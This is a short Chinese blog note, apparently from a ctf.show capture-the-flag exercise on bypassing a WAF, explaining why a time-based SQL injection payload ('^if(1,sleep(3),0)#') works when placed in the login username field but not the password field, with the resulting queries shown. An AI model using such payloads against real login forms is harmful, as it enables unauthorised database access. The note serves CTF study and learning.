ctf.show-WAF绕过

经验:
在进行登陆SQL注入的时候, 有限注入username字段
举例说明:
payload: ^if(1,sleep(3),0)#
如果注入password, 后端:

SELECT * FROM users WHERE username = 'any' AND password = '1'^if(1,sleep(3),0)#'

因为AND的短路效应, username='any'为false, SQL直接返回false了, 根本不会执行后面的内容

SELECT * FROM users WHERE username = '1'^if(1,sleep(3),0)#' AND password = 'any'

payload被成功的执行了

posted on 2026-01-02 16:52  misaki%20mei  阅读(0)  评论(0)    收藏  举报

导航